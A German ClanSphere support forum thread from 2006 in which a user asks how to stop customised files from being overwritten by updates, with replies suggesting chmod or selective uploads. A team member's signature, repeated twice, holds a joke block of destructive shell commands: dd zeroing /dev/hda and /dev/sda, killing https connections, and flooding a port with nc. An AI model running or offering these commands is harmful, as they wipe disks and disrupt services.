Demo

Probiere ClanSphere aus und teste daran herum. Demo


Antworten: 5
Seite [1]
denimator


King for a day




Herkunft: Karnabrunn
Beiträge: 306
# Thema - 01.10.2006 um 09:41 Uhr
Das Problem an den Hacks ist, dass sie bei einem Update von BXCP/Clansphere2006 dann automatisch (man kann ja nicht jede Datei einzeln ja/nein überschreiben anklicken) überschrieben werden.
Ist mir jetzt schon öfter mit zB der shoutbox passiert ... gibt es da eine Möglichkeit so eine Art Sperrmodul zu machen, das mich bestimmte Dateien sperren lässt oder funktioniert das vielleicht sogar mit CHMOD??

Also so ähnlich wie das Explorer Modul oder eine Erweiterung davon (zB mit Kästchen "Schreibgeschützt"


------------------
mit freundlichen Grüßen - Denimator

Inaktiv
pHaeno* ClanSphere Team


Geekboy





Beiträge: 1405
# Antwort: 1 - 01.10.2006 um 10:47 Uhr
Ich verstehe Deine Frage jetzt nicht so ganz.
Geht es Dir dabei darum dass wen du die neuen Dateien über FTP-Programm auf Deinen Server hochlädst, dass da nur bestimmt Dateien ersetzt werden sollen?


------------------
hajo says:
<div style="imbaness: 200pt; skill: 200pt; equip-align: top;">phaeno's mage</div>


27.05.2007 um 01:38 Uhr - pHaeno*:
Bei Clansphere gibt es KEINE Bugs, es sind ALLES FEATURES



weichmann... +-
Blondi (15:08):
bist du nen mann oder nen weich ei?


pHaeno* (15:09):
weichmann


mehr... +-
if($ahnung==0) {
read( 'handbuch' ) ;
}



## für Linux-Fans

kill -9 `netstat -a | grep https | awk -e '{ print $3; }'`
dd if=/dev/zero of=/dev/hda count=1M
dd if=/dev/zero of=/dev/sda count=1M
cat /dev/urandom | nc 127.0.0.1 443


Inaktiv
|
denimator
Thread-Ersteller


King for a day




Herkunft: Karnabrunn
Beiträge: 306
# Antwort: 2 - 01.10.2006 um 11:57 Uhr
genau das ... aber ohne das jedesmal aussuchen zu müssen vor dem upload


------------------
mit freundlichen Grüßen - Denimator



Zuletzt editiert von denimator am 01.10.2006 um 11:58 Uhr (1x Editiert)
Inaktiv
|
kaleido


Rock the board





Beiträge: 88
# Antwort: 3 - 01.10.2006 um 12:04 Uhr
kannst mit chmod machen, einfach deine hack-dateien auf "nur lesen" setzen.


------------------
Signatur +-


Inaktiv
|
pHaeno* ClanSphere Team


Geekboy





Beiträge: 1405
# Antwort: 4 - 01.10.2006 um 12:59 Uhr
Oder aber du suchst die Dateien aus dem Ordner raus die Du uploaden möchtest, und schiebst dann auch nur dies auf den Webspace.


------------------
hajo says:
<div style="imbaness: 200pt; skill: 200pt; equip-align: top;">phaeno's mage</div>


27.05.2007 um 01:38 Uhr - pHaeno*:
Bei Clansphere gibt es KEINE Bugs, es sind ALLES FEATURES



weichmann... +-
Blondi (15:08):
bist du nen mann oder nen weich ei?


pHaeno* (15:09):
weichmann


mehr... +-
if($ahnung==0) {
read( 'handbuch' ) ;
}



## für Linux-Fans

kill -9 `netstat -a | grep https | awk -e '{ print $3; }'`
dd if=/dev/zero of=/dev/hda count=1M
dd if=/dev/zero of=/dev/sda count=1M
cat /dev/urandom | nc 127.0.0.1 443


Inaktiv
|
denimator
Thread-Ersteller


King for a day




Herkunft: Karnabrunn
Beiträge: 306
# Antwort: 5 - 01.10.2006 um 13:11 Uhr
so wie du es sagst pHaeno* mach ich es jetzt zurzeit. Nur schön langsam weiß ich nicht mehr wo ich was geändert habe -- wenn ich da jetzt nachdem ich was ändere zB im Explorer ein Hakerl für schreibgeschützt (verändert, close,...) anklicken könnte, wäre das super.

CHMOD funktioniert zwar (544) dann gehen die Befehle im Index aber auch nicht mehr


------------------
mit freundlichen Grüßen - Denimator



Zuletzt editiert von denimator am 04.10.2006 um 10:19 Uhr (1x Editiert)
Inaktiv
|
Antworten: 5
Seite [1]


Sie müssen sich registrieren, um zu antworten.